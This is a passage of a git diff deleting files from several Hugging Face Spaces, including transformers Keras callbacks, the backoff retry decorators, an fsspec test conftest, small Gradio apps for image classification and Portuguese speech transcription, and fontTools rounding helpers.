every epoch. Unlike normal Keras metrics, these do not need to be - compilable by TF. It is particularly useful for common NLP metrics like BLEU and ROUGE that require string - operations or generation loops that cannot be compiled. Predictions (or generations) will be computed on the - `eval_dataset` before being passed to the `metric_fn` in `np.ndarray` format. The `metric_fn` should compute - metrics and return a dict mapping metric names to metric values. - - We provide an example of a suitable metric_fn that computes ROUGE scores for a summarization model below. 
Note that - this example skips some post-processing for readability and simplicity, and should probably not be used as-is! - - ```py - from datasets import load_metric - - rouge_metric = load_metric("rouge") - - - def rouge_fn(predictions, labels): - decoded_predictions = tokenizer.batch_decode(predictions, skip_special_tokens=True) - decoded_labels = tokenizer.batch_decode(labels, skip_special_tokens=True) - result = rouge_metric.compute(predictions=decoded_predictions, references=decoded_labels) - return {key: value.mid.fmeasure * 100 for key, value in result.items()} - ``` - - The above function will return a dict containing values which will be logged like any other Keras metric: - - ``` - {'rouge1': 37.4199, 'rouge2': 13.9768, 'rougeL': 34.361, 'rougeLsum': 35.0781} - ``` - - Args: - metric_fn (`Callable`): - Metric function provided by the user. It will be called with two arguments - `predictions` and `labels`. - These contain the model's outputs and matching labels from the dataset. It should return a dict mapping - metric names to numerical values. - eval_dataset (`tf.data.Dataset` or `dict` or `tuple` or `np.ndarray` or `tf.Tensor`): - Validation data to be used to generate predictions for the `metric_fn`. - output_cols (`List[str]`, *optional*): - A list of columns to be retained from the model output as the predictions. Defaults to all. - label_cols (`List[str]`, *optional*): - A list of columns to be retained from the input dataset as the labels. Will be autodetected if this is not - supplied. - batch_size (`int`, *optional*): - Batch size. Only used when the data is not a pre-batched `tf.data.Dataset`. - predict_with_generate (`bool`, *optional*, defaults to `False`): - Whether we should use `model.generate()` to get outputs for the model. - use_xla_generation (`bool`, *optional*, defaults to `False`): - If we're generating, whether to compile model generation with XLA. This can massively increase the speed of - generation (up to 100X speedup) but will require a new XLA compilation for each input shape. When using XLA - generation, it's a good idea to pad your inputs to the same size, or to use the `pad_to_multiple_of` - argument in your `tokenizer` or `DataCollator`, which will reduce the number of unique input shapes and - save a lot of compilation time. This option has no effect if `predict_with_generate` is `False`. - generate_kwargs (`dict`, *optional*): - Keyword arguments to pass to `model.generate()` when generating. Has no effect if `predict_with_generate` - is `False`. - - """ - - def __init__( - self, - metric_fn: Callable, - eval_dataset: Union[tf.data.Dataset, np.ndarray, tf.Tensor, tuple, dict], - output_cols: Optional[List[str]] = None, - label_cols: Optional[List[str]] = None, - batch_size: Optional[int] = None, - predict_with_generate: bool = False, - use_xla_generation: bool = False, - generate_kwargs: Optional[dict] = None, - ): - super().__init__() - self.metric_fn = metric_fn - self.batch_size = batch_size - if not isinstance(eval_dataset, tf.data.Dataset): - if batch_size is None: - raise ValueError( - "When passing data to KerasMetricCallback that is not a pre-batched tf.data.Dataset " - "the batch_size argument must be set." 
- ) - # Wrap a tf.data.Dataset around it - eval_dataset = tf.data.Dataset.from_tensor_slices(eval_dataset).batch(batch_size, drop_remainder=False) - self.eval_dataset = eval_dataset - self.predict_with_generate = predict_with_generate - self.output_cols = output_cols - - # This next block attempts to parse out which elements of the dataset should be appended to the labels list - # that is passed to the metric_fn - if isinstance(eval_dataset.element_spec, tuple) and len(eval_dataset.element_spec) == 2: - input_spec, label_spec = eval_dataset.element_spec - else: - input_spec = eval_dataset.element_spec - label_spec = None - if label_cols is not None: - for label in label_cols: - if label not in input_spec: - raise ValueError(f"Label {label} is in label_cols but could not be found in the dataset inputs!") - self.label_cols = label_cols - self.use_keras_label = False - elif label_spec is not None: - # If the dataset inputs are split into a 2-tuple of inputs and labels, - # assume the second element is the labels - self.label_cols = None - self.use_keras_label = True - elif "labels" in input_spec: - self.label_cols = ["labels"] - self.use_keras_label = False - logging.warning("No label_cols specified for KerasMetricCallback, assuming you want the 'labels' key.") - elif "start_positions" in input_spec and "end_positions" in input_spec: - self.label_cols = ["start_positions", "end_positions"] - self.use_keras_label = False - logging.warning( - "No label_cols specified for KerasMetricCallback, assuming you want the " - "start_positions and end_positions keys." - ) - else: - raise ValueError("Could not autodetect label_cols for KerasMetricCallback, please specify them!") - if parse(tf.__version__) < parse("2.7"): - logging.warning("TF versions less than 2.7 may encounter issues with KerasMetricCallback!") - - self.use_xla_generation = use_xla_generation - self.generate_kwargs = {} if generate_kwargs is None else generate_kwargs - - self.generation_function = None - - @staticmethod - def _concatenate_batches(batches, padding_index=-100): - # If all batches are unidimensional or same length, do a simple concatenation - if batches[0].ndim == 1 or all([batch.shape[1] == batches[0].shape[1] for batch in batches]): - return np.concatenate(batches, axis=0) - - # Welp, they're not the same length. 
Let's do some padding - max_len = max([batch.shape[1] for batch in batches]) - num_samples = sum([batch.shape[0] for batch in batches]) - output = np.full_like( - batches[0], fill_value=padding_index, shape=[num_samples, max_len] + list(batches[0].shape[2:]) - ) - # i keeps track of which part of the concatenated array we're writing the next batch to - i = 0 - for batch in batches: - output[i : i + len(batch), : batch.shape[1]] = batch - i += len(batch) - return output - - def _postprocess_predictions_or_labels(self, inputs): - if isinstance(inputs[0], dict): - outputs = {} - for key in inputs[0].keys(): - outputs[key] = self._concatenate_batches([batch[key] for batch in inputs]) - # If it's a dict with only one key, just return the array - if len(outputs) == 1: - outputs = list(outputs.values())[0] - elif isinstance(inputs[0], list) or isinstance(inputs[0], tuple): - outputs = [] - for input_list in zip(*inputs): - outputs.append(self._concatenate_batches(input_list)) - if len(outputs) == 1: - outputs = outputs[0] # If it's a list with only one element, just return the array - elif isinstance(inputs[0], np.ndarray): - outputs = self._concatenate_batches(inputs) - elif isinstance(inputs[0], tf.Tensor): - outputs = self._concatenate_batches([tensor.numpy() for tensor in inputs]) - else: - raise TypeError(f"Couldn't handle batch of type {type(inputs[0])}!") - return outputs - - def on_epoch_end(self, epoch, logs=None): - if hasattr(self.model, "config"): - ignore_keys = getattr(self.model.config, "keys_to_ignore_at_inference", []) - else: - ignore_keys = [] - - main_input_name = None - if self.predict_with_generate: - # This dense conditional recognizes the case where we have an encoder-decoder model, but - # avoids getting tangled up when we just have a model with a layer called 'encoder' - if hasattr(self.model, "encoder") and hasattr(self.model.encoder, "main_input_name"): - if self.model.encoder.main_input_name != self.model.main_input_name: - main_input_name = self.model.encoder.main_input_name - else: - main_input_name = getattr(self.model, "main_input_name", "input_ids") - - if self.use_xla_generation and self.generation_function is None: - - def generation_function(inputs, attention_mask): - return self.model.generate(inputs, attention_mask=attention_mask, **self.generate_kwargs) - - self.generation_function = tf.function(generation_function, jit_compile=True) - - prediction_list = [] - label_list = [] - - # The whole predict/generate loop is handled inside this method - for batch in self.eval_dataset: - if isinstance(batch, tuple): - batch, labels = batch - else: - labels = None - if self.predict_with_generate: - if isinstance(batch, dict): - generation_inputs = batch[main_input_name] - attention_mask = batch.get("attention_mask", None) - else: - generation_inputs = batch - attention_mask = None - if self.use_xla_generation: - predictions = self.generation_function(generation_inputs, attention_mask=attention_mask) - else: - predictions = self.model.generate(generation_inputs, attention_mask=attention_mask) - else: - predictions = self.model.predict_on_batch(batch) - if isinstance(predictions, dict): - # This converts any dict-subclass to a regular dict - # Keras REALLY doesn't like it when we pass around a BatchEncoding or other derived class - predictions = dict(predictions) - if self.output_cols is not None: - predictions = {key: predictions[key] for key in self.output_cols} - else: - predictions = { - key: val for key, val in predictions.items() if key not in ignore_keys + 
["loss"] - } - prediction_list.append(predictions) - if not self.use_keras_label: - labels = {key: batch[key].numpy() for key in self.label_cols} - elif isinstance(labels, dict): - labels = {key: array.numpy() for key, array in labels.items()} - elif isinstance(labels, list) or isinstance(labels, tuple): - labels = [array.numpy() for array in labels] - elif isinstance(labels, tf.Tensor): - labels = labels.numpy() - else: - raise TypeError(f"Confused by labels of type {type(labels)}") - label_list.append(labels) - - all_preds = self._postprocess_predictions_or_labels(prediction_list) - all_labels = self._postprocess_predictions_or_labels(label_list) - - metric_output = self.metric_fn((all_preds, all_labels)) - if not isinstance(metric_output, dict): - raise TypeError( - f"metric_fn should return a dict mapping metric names to values but instead returned {metric_output}" - ) - # This is the critical bit - Keras passes a dict containing the loss and standard metric values for this epoch - # in the logs argument. Ordinarily, this is so the callback can read them, but in this case we write a bunch of - # new keys in there, which will then get read by the History callback and treated like any other metric value. - # I promise that I have it in writing from Chollet that this is okay. - logs.update(metric_output) - - -class PushToHubCallback(Callback): - """ - Callback that will save and push the model to the Hub regularly. By default, it pushes once per epoch, but this can - be changed with the `save_strategy` argument. Pushed models can be accessed like any other model on the hub, such - as with the `from_pretrained` method. - - ```py - from transformers.keras_callbacks import PushToHubCallback - - push_to_hub_callback = PushToHubCallback( - output_dir="./model_save", - tokenizer=tokenizer, - hub_model_id="gpt5-7xlarge", - ) - - model.fit(train_dataset, callbacks=[push_to_hub_callback]) - ``` - - Args: - output_dir (`str`): - The output directory where the model predictions and checkpoints will be written and synced with the - repository on the Hub. - save_strategy (`str` or [`~trainer_utils.IntervalStrategy`], *optional*, defaults to `"epoch"`): - The checkpoint save strategy to adopt during training. Possible values are: - - - `"no"`: Save is done at the end of training. - - `"epoch"`: Save is done at the end of each epoch. - - `"steps"`: Save is done every `save_steps` - save_steps (`int`, *optional*): - The number of steps between saves when using the "steps" `save_strategy`. - tokenizer (`PreTrainedTokenizerBase`, *optional*): - The tokenizer used by the model. If supplied, will be uploaded to the repo alongside the weights. - hub_model_id (`str`, *optional*): - The name of the repository to keep in sync with the local `output_dir`. It can be a simple model ID in - which case the model will be pushed in your namespace. Otherwise it should be the whole repository name, - for instance `"user_name/model"`, which allows you to push to an organization you are a member of with - `"organization_name/model"`. - - Will default to the name of `output_dir`. - hub_token (`str`, *optional*): - The token to use to push the model to the Hub. Will default to the token in the cache folder obtained with - `huggingface-cli login`. - checkpoint (`bool`, *optional*, defaults to `False`): - Whether to save full training checkpoints (including epoch and optimizer state) to allow training to be - resumed. Only usable when `save_strategy` is `"epoch"`. 
- """ - - def __init__( - self, - output_dir: Union[str, Path], - save_strategy: Union[str, IntervalStrategy] = "epoch", - save_steps: Optional[int] = None, - tokenizer: Optional[PreTrainedTokenizerBase] = None, - hub_model_id: Optional[str] = None, - hub_token: Optional[str] = None, - checkpoint: bool = False, - **model_card_args, - ): - super().__init__() - if checkpoint and save_strategy != "epoch": - raise ValueError("Cannot save checkpoints when save_strategy is not 'epoch'!") - if isinstance(save_strategy, str): - save_strategy = IntervalStrategy(save_strategy.lower()) - self.save_strategy = save_strategy - if self.save_strategy == IntervalStrategy.STEPS and (not isinstance(save_steps, int) or save_steps <= 0): - raise ValueError("Please supply a positive integer argument for save_steps when save_strategy == 'steps'!") - self.save_steps = save_steps - output_dir = Path(output_dir) - if hub_model_id is None: - hub_model_id = output_dir.absolute().name - if "/" not in hub_model_id: - hub_model_id = get_full_repo_name(hub_model_id, token=hub_token) - - self.output_dir = output_dir - self.hub_model_id = hub_model_id - create_repo(self.hub_model_id, exist_ok=True) - self.repo = Repository(str(self.output_dir), clone_from=self.hub_model_id, token=hub_token) - - self.tokenizer = tokenizer - self.last_job = None - self.checkpoint = checkpoint - self.training_history = None - self.model_card_args = model_card_args - - def on_train_begin(self, logs=None): - # Although we can access model.history, we have no guarantees that the History callback will fire before this - # one, so we keep track of it here too - self.training_history = [] - - def on_train_batch_end(self, batch, logs=None): - if self.save_strategy == IntervalStrategy.STEPS and (batch + 1) % self.save_steps == 0: - if self.last_job is not None and not self.last_job.is_done: - return # The last upload is still running, don't start another - self.model.save_pretrained(self.output_dir) - if self.tokenizer is not None: - self.tokenizer.save_pretrained(self.output_dir) - _, self.last_job = self.repo.push_to_hub( - commit_message=f"Training in progress steps {batch}", blocking=False - ) - - def on_epoch_end(self, epoch, logs=None): - logs = logs.copy() # Don't accidentally write things that Keras will read later - if "epoch" not in logs: - logs["epoch"] = epoch - self.training_history.append(logs) - if self.save_strategy == IntervalStrategy.EPOCH: - if self.last_job is not None and not self.last_job.is_done: - return # The last upload is still running, don't start another - self.model.save_pretrained(self.output_dir) - if self.tokenizer is not None: - self.tokenizer.save_pretrained(self.output_dir) - if self.checkpoint: - checkpoint_dir = os.path.join(self.output_dir, "checkpoint") - self.model._save_checkpoint(checkpoint_dir, epoch) - train_summary = TrainingSummary.from_keras( - model=self.model, - model_name=self.hub_model_id, - keras_history=self.training_history, - **self.model_card_args, - ) - model_card = train_summary.to_model_card() - with (self.output_dir / "README.md").open("w") as f: - f.write(model_card) - _, self.last_job = self.repo.push_to_hub( - commit_message=f"Training in progress epoch {epoch}", blocking=False - ) - - def on_train_end(self, logs=None): - # Makes sure the latest version of the model is uploaded - if self.last_job is not None and not self.last_job.is_done: - logging.info("Pushing the last epoch to the Hub, this may take a while...") - while not self.last_job.is_done: - sleep(1) - else: - 
self.model.save_pretrained(self.output_dir) - if self.tokenizer is not None: - self.tokenizer.save_pretrained(self.output_dir) - train_summary = TrainingSummary.from_keras( - model=self.model, - model_name=self.hub_model_id, - keras_history=self.training_history, - **self.model_card_args, - ) - model_card = train_summary.to_model_card() - with (self.output_dir / "README.md").open("w") as f: - f.write(model_card) - self.repo.push_to_hub(commit_message="End of training", blocking=True) diff --git a/spaces/chongjie/PoseDiffusion_MVP/models/__init__.py b/spaces/chongjie/PoseDiffusion_MVP/models/__init__.py deleted file mode 100644 index 55caf1ef35c4dba7a1d017a8315c76e076ecacd0..0000000000000000000000000000000000000000 --- a/spaces/chongjie/PoseDiffusion_MVP/models/__init__.py +++ /dev/null @@ -1,12 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from .pose_diffusion_model import PoseDiffusionModel - - -from .denoiser import Denoiser, TransformerEncoderWrapper -from .gaussian_diffuser import GaussianDiffusion -from .image_feature_extractor import MultiScaleImageFeatureExtractor diff --git a/spaces/chrisbodhi/minima/app.py b/spaces/chrisbodhi/minima/app.py deleted file mode 100644 index c10ca1e056f37147265cada14d28b2e70e7cd58b..0000000000000000000000000000000000000000 --- a/spaces/chrisbodhi/minima/app.py +++ /dev/null @@ -1,21 +0,0 @@ -import gradio as gr -from fastai.vision.all import * -import skimage - - -def is_cat(x): return x[0].isupper() - -learn = load_learner('model.pkl') - -categories = ('Dog', 'Cat') - -def predict(img): - pred, idx, probs = learn.predict(img) - print(pred, idx) - return dict(zip(categories, map(float,probs))) - -image = gr.inputs.Image(shape=(192, 192)) -label = gr.outputs.Label() - -intf = gr.Interface(fn=predict, inputs=image, outputs=label) -intf.launch(inline=False) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/backoff/_decorator.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/backoff/_decorator.py deleted file mode 100644 index 92dee1bb76178d0beaa2ae841d5d0325e3ac27d3..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/backoff/_decorator.py +++ /dev/null @@ -1,222 +0,0 @@ -# coding:utf-8 -import asyncio -import logging -import operator -from typing import Any, Callable, Iterable, Optional, Type, Union - -from backoff._common import ( - _prepare_logger, - _config_handlers, - _log_backoff, - _log_giveup -) -from backoff._jitter import full_jitter -from backoff import _async, _sync -from backoff._typing import ( - _CallableT, - _Handler, - _Jitterer, - _MaybeCallable, - _MaybeLogger, - _MaybeSequence, - _Predicate, - _WaitGenerator, -) - - -def on_predicate(wait_gen: _WaitGenerator, - predicate: _Predicate[Any] = operator.not_, - *, - max_tries: Optional[_MaybeCallable[int]] = None, - max_time: Optional[_MaybeCallable[float]] = None, - jitter: Union[_Jitterer, None] = full_jitter, - on_success: Union[_Handler, Iterable[_Handler], None] = None, - on_backoff: Union[_Handler, Iterable[_Handler], None] = None, - on_giveup: Union[_Handler, Iterable[_Handler], None] = None, - logger: _MaybeLogger = 'backoff', - backoff_log_level: int = logging.INFO, - giveup_log_level: int = logging.ERROR, - **wait_gen_kwargs: Any) -> Callable[[_CallableT], _CallableT]: - """Returns 
decorator for backoff and retry triggered by predicate. - - Args: - wait_gen: A generator yielding successive wait times in - seconds. - predicate: A function which when called on the return value of - the target function will trigger backoff when considered - truthily. If not specified, the default behavior is to - backoff on falsey return values. - max_tries: The maximum number of attempts to make before giving - up. In the case of failure, the result of the last attempt - will be returned. The default value of None means there - is no limit to the number of tries. If a callable is passed, - it will be evaluated at runtime and its return value used. - max_time: The maximum total amount of time to try for before - giving up. If this time expires, the result of the last - attempt will be returned. If a callable is passed, it will - be evaluated at runtime and its return value used. - jitter: A function of the value yielded by wait_gen returning - the actual time to wait. This distributes wait times - stochastically in order to avoid timing collisions across - concurrent clients. Wait times are jittered by default - using the full_jitter function. Jittering may be disabled - altogether by passing jitter=None. - on_success: Callable (or iterable of callables) with a unary - signature to be called in the event of success. The - parameter is a dict containing details about the invocation. - on_backoff: Callable (or iterable of callables) with a unary - signature to be called in the event of a backoff. The - parameter is a dict containing details about the invocation. - on_giveup: Callable (or iterable of callables) with a unary - signature to be called in the event that max_tries - is exceeded. The parameter is a dict containing details - about the invocation. - logger: Name of logger or Logger object to log to. Defaults to - 'backoff'. - backoff_log_level: log level for the backoff event. Defaults to "INFO" - giveup_log_level: log level for the give up event. Defaults to "ERROR" - **wait_gen_kwargs: Any additional keyword args specified will be - passed to wait_gen when it is initialized. Any callable - args will first be evaluated and their return values passed. - This is useful for runtime configuration. - """ - def decorate(target): - nonlocal logger, on_success, on_backoff, on_giveup - - logger = _prepare_logger(logger) - on_success = _config_handlers(on_success) - on_backoff = _config_handlers( - on_backoff, - default_handler=_log_backoff, - logger=logger, - log_level=backoff_log_level - ) - on_giveup = _config_handlers( - on_giveup, - default_handler=_log_giveup, - logger=logger, - log_level=giveup_log_level - ) - - if asyncio.iscoroutinefunction(target): - retry = _async.retry_predicate - else: - retry = _sync.retry_predicate - - return retry( - target, - wait_gen, - predicate, - max_tries=max_tries, - max_time=max_time, - jitter=jitter, - on_success=on_success, - on_backoff=on_backoff, - on_giveup=on_giveup, - wait_gen_kwargs=wait_gen_kwargs - ) - - # Return a function which decorates a target with a retry loop. 
- return decorate - - -def on_exception(wait_gen: _WaitGenerator, - exception: _MaybeSequence[Type[Exception]], - *, - max_tries: Optional[_MaybeCallable[int]] = None, - max_time: Optional[_MaybeCallable[float]] = None, - jitter: Union[_Jitterer, None] = full_jitter, - giveup: _Predicate[Exception] = lambda e: False, - on_success: Union[_Handler, Iterable[_Handler], None] = None, - on_backoff: Union[_Handler, Iterable[_Handler], None] = None, - on_giveup: Union[_Handler, Iterable[_Handler], None] = None, - raise_on_giveup: bool = True, - logger: _MaybeLogger = 'backoff', - backoff_log_level: int = logging.INFO, - giveup_log_level: int = logging.ERROR, - **wait_gen_kwargs: Any) -> Callable[[_CallableT], _CallableT]: - """Returns decorator for backoff and retry triggered by exception. - - Args: - wait_gen: A generator yielding successive wait times in - seconds. - exception: An exception type (or tuple of types) which triggers - backoff. - max_tries: The maximum number of attempts to make before giving - up. Once exhausted, the exception will be allowed to escape. - The default value of None means there is no limit to the - number of tries. If a callable is passed, it will be - evaluated at runtime and its return value used. - max_time: The maximum total amount of time to try for before - giving up. Once expired, the exception will be allowed to - escape. If a callable is passed, it will be - evaluated at runtime and its return value used. - jitter: A function of the value yielded by wait_gen returning - the actual time to wait. This distributes wait times - stochastically in order to avoid timing collisions across - concurrent clients. Wait times are jittered by default - using the full_jitter function. Jittering may be disabled - altogether by passing jitter=None. - giveup: Function accepting an exception instance and - returning whether or not to give up. Optional. The default - is to always continue. - on_success: Callable (or iterable of callables) with a unary - signature to be called in the event of success. The - parameter is a dict containing details about the invocation. - on_backoff: Callable (or iterable of callables) with a unary - signature to be called in the event of a backoff. The - parameter is a dict containing details about the invocation. - on_giveup: Callable (or iterable of callables) with a unary - signature to be called in the event that max_tries - is exceeded. The parameter is a dict containing details - about the invocation. - raise_on_giveup: Boolean indicating whether the registered exceptions - should be raised on giveup. Defaults to `True` - logger: Name or Logger object to log to. Defaults to 'backoff'. - backoff_log_level: log level for the backoff event. Defaults to "INFO" - giveup_log_level: log level for the give up event. Defaults to "ERROR" - **wait_gen_kwargs: Any additional keyword args specified will be - passed to wait_gen when it is initialized. Any callable - args will first be evaluated and their return values passed. - This is useful for runtime configuration. 
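As an illustration only, a typical application of this decorator might look like the sketch below; it assumes the package's public aliases (e.g. `backoff.expo`, `backoff.on_exception`) and the third-party `requests` library, neither of which is defined in this module:

```py
import backoff
import requests


@backoff.on_exception(backoff.expo, requests.exceptions.RequestException, max_tries=5, max_time=30)
def get_url(url):
    # Retried with exponential backoff (full jitter by default) whenever requests raises.
    return requests.get(url, timeout=10)
```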
- """ - def decorate(target): - nonlocal logger, on_success, on_backoff, on_giveup - - logger = _prepare_logger(logger) - on_success = _config_handlers(on_success) - on_backoff = _config_handlers( - on_backoff, - default_handler=_log_backoff, - logger=logger, - log_level=backoff_log_level, - ) - on_giveup = _config_handlers( - on_giveup, - default_handler=_log_giveup, - logger=logger, - log_level=giveup_log_level, - ) - - if asyncio.iscoroutinefunction(target): - retry = _async.retry_exception - else: - retry = _sync.retry_exception - - return retry( - target, - wait_gen, - exception, - max_tries=max_tries, - max_time=max_time, - jitter=jitter, - giveup=giveup, - on_success=on_success, - on_backoff=on_backoff, - on_giveup=on_giveup, - raise_on_giveup=raise_on_giveup, - wait_gen_kwargs=wait_gen_kwargs - ) - - # Return a function which decorates a target with a retry loop. - return decorate diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/text/__init__.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/text/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py deleted file mode 100644 index 30a0ae626c26cc285e7e89e38180043239d9b0eb..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py +++ /dev/null @@ -1,25 +0,0 @@ -from typing import Optional - -from fastapi.concurrency import AsyncExitStack -from starlette.types import ASGIApp, Receive, Scope, Send - - -class AsyncExitStackMiddleware: - def __init__(self, app: ASGIApp, context_name: str = "fastapi_astack") -> None: - self.app = app - self.context_name = context_name - - async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None: - dependency_exception: Optional[Exception] = None - async with AsyncExitStack() as stack: - scope[self.context_name] = stack - try: - await self.app(scope, receive, send) - except Exception as e: - dependency_exception = e - raise e - if dependency_exception: - # This exception was possibly handled by the dependency but it should - # still bubble up so that the ServerErrorMiddleware can return a 500 - # or the ExceptionMiddleware can catch and handle any other exceptions - raise dependency_exception diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fsspec/conftest.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fsspec/conftest.py deleted file mode 100644 index 6874a42c4895c3c7b973dc5d63fd4488a4e60b44..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fsspec/conftest.py +++ /dev/null @@ -1,55 +0,0 @@ -import os -import shutil -import subprocess -import sys -import time - -import pytest - -import fsspec -from fsspec.implementations.cached import CachingFileSystem - - -@pytest.fixture() -def m(): - """ - Fixture providing a memory filesystem. 
- """ - m = fsspec.filesystem("memory") - m.store.clear() - m.pseudo_dirs.clear() - m.pseudo_dirs.append("") - try: - yield m - finally: - m.store.clear() - m.pseudo_dirs.clear() - m.pseudo_dirs.append("") - - -@pytest.fixture -def ftp_writable(tmpdir): - """ - Fixture providing a writable FTP filesystem. - """ - pytest.importorskip("pyftpdlib") - from fsspec.implementations.ftp import FTPFileSystem - - FTPFileSystem.clear_instance_cache() # remove lingering connections - CachingFileSystem.clear_instance_cache() - d = str(tmpdir) - with open(os.path.join(d, "out"), "wb") as f: - f.write(b"hello" * 10000) - P = subprocess.Popen( - [sys.executable, "-m", "pyftpdlib", "-d", d, "-u", "user", "-P", "pass", "-w"] - ) - try: - time.sleep(1) - yield "localhost", 2121, "user", "pass" - finally: - P.terminate() - P.wait() - try: - shutil.rmtree(tmpdir) - except Exception: - pass diff --git a/spaces/cihyFjudo/fairness-paper-search/Im Not the Only One by Sam Smith A Masterpiece of Soulful Pop Music.md b/spaces/cihyFjudo/fairness-paper-search/Im Not the Only One by Sam Smith A Masterpiece of Soulful Pop Music.md deleted file mode 100644 index 5d6b15b76bec5528bb38f150ff6762ce4bd5e135..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Im Not the Only One by Sam Smith A Masterpiece of Soulful Pop Music.md +++ /dev/null @@ -1,5 +0,0 @@ - -

      \ No newline at end of file diff --git a/spaces/cihyFjudo/fairness-paper-search/phpFox v3 6 0 Nulled Script 1 Features Benefits and Reviews of phpFox Social Network Platform.md b/spaces/cihyFjudo/fairness-paper-search/phpFox v3 6 0 Nulled Script 1 Features Benefits and Reviews of phpFox Social Network Platform.md deleted file mode 100644 index 79697e6fee539f30ce97ac4028b7fa5f084e60ab..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/phpFox v3 6 0 Nulled Script 1 Features Benefits and Reviews of phpFox Social Network Platform.md +++ /dev/null @@ -1,6 +0,0 @@ -

      diff --git a/spaces/cjayic/soft-vc-widowmaker/acoustic/__init__.py b/spaces/cjayic/soft-vc-widowmaker/acoustic/__init__.py deleted file mode 100644 index 38186d082ce0ebfd2c51a37eec2be085520a8b1c..0000000000000000000000000000000000000000 --- a/spaces/cjayic/soft-vc-widowmaker/acoustic/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from .model import AcousticModel, hubert_discrete, hubert_soft diff --git a/spaces/cloudqi/CQI_Fala_para_Texto_PT_V0/app.py b/spaces/cloudqi/CQI_Fala_para_Texto_PT_V0/app.py deleted file mode 100644 index 08b1492503afcf121572ceb06d5cccc43b650348..0000000000000000000000000000000000000000 --- a/spaces/cloudqi/CQI_Fala_para_Texto_PT_V0/app.py +++ /dev/null @@ -1,101 +0,0 @@ -import torch - -import gradio as gr -import pytube as pt -from transformers import pipeline -from huggingface_hub import model_info - -MODEL_NAME = "cloudqi/cqi_speech_recognize_pt_v0" - -device = "cuda" if torch.cuda.is_available() else "cpu" - -pipe = pipeline( - task="automatic-speech-recognition", - model=MODEL_NAME, - chunk_length_s=30, - device=device, -) - -langs = model_info(MODEL_NAME).cardData["language"] - -article = f"
      Esse modelo suporta {len(langs)} línguas ! (Clique para expandir)> {langs}
      " - -def transcribe(microphone, file_upload): - warn_output = "" - if (microphone is not None) and (file_upload is not None): - warn_output = ( - "WARNING: Você carregou um arquivo de áudio e usou o microfone. " - "The recorded file from the microphone will be used and the uploaded audio will be discarded.\n" - ) - - elif (microphone is None) and (file_upload is None): - return "ERROR: Transcreva microfones longos ou entradas de áudio com o clique de um botão" - - file = microphone if microphone is not None else file_upload - - text = pipe(file)["text"] - - return warn_output + text - - -def _return_yt_html_embed(yt_url): - video_id = yt_url.split("?v=")[-1] - HTML_str = ( - f'
      ' - "
      " - ) - return HTML_str - - -def yt_transcribe(yt_url): - yt = pt.YouTube(yt_url) - html_embed_str = _return_yt_html_embed(yt_url) - stream = yt.streams.filter(only_audio=True)[0] - stream.download(filename="audio.mp3") - - text = pipe("audio.mp3")["text"] - - return html_embed_str, text - - -demo = gr.Blocks() - -mf_transcribe = gr.Interface( - fn=transcribe, - inputs=[ - gr.inputs.Audio(source="microphone", type="filepath", optional=True), - gr.inputs.Audio(source="upload", type="filepath", optional=True), - ], - outputs="text", - layout="horizontal", - theme="huggingface", - title="Demonstração: Transcrever Audio", - description=( - "Transcreva microfones longos ou entradas de áudio com o clique de um botão! Essa Demo usa o ajuste fino" - f" checkpoint [{MODEL_NAME}](https://huggingface.co/{MODEL_NAME}) e 🤗 Transformers para transcrever arquivos de áudio" - " de comprimento arbitrário." - ), - article=article, - allow_flagging="never", -) - -yt_transcribe = gr.Interface( - fn=yt_transcribe, - inputs=[gr.inputs.Textbox(lines=1, placeholder="Cole o URL de um vídeo do YouTube aqui", label="YouTube URL")], - outputs=["html", "text"], - layout="horizontal", - theme="huggingface", - title="Transcrever do YouTube", - description=( - "Gere legendas com um clique ! A demonstração usa o ponto de verificação aprimorado:" - f" [{MODEL_NAME}](https://huggingface.co/{MODEL_NAME}) e 🤗 Transformers para transcrever arquivos de áudio de" - " comprimento arbitrário." - ), - article=article, - allow_flagging="never", -) - -with demo: - gr.TabbedInterface([mf_transcribe, yt_transcribe], ["Transcrever de áudio", "Transcrever do YouTube"]) - -demo.launch(enable_queue=True) diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/misc/roundTools.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/misc/roundTools.py deleted file mode 100644 index 48a47c07c8575895f894a24065046bc308a69b97..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/misc/roundTools.py +++ /dev/null @@ -1,109 +0,0 @@ -""" -Various round-to-integer helpers. -""" - -import math -import functools -import logging - -log = logging.getLogger(__name__) - -__all__ = [ - "noRound", - "otRound", - "maybeRound", - "roundFunc", -] - - -def noRound(value): - return value - - -def otRound(value): - """Round float value to nearest integer towards ``+Infinity``. - - The OpenType spec (in the section on `"normalization" of OpenType Font Variations `_) - defines the required method for converting floating point values to - fixed-point. In particular it specifies the following rounding strategy: - - for fractional values of 0.5 and higher, take the next higher integer; - for other 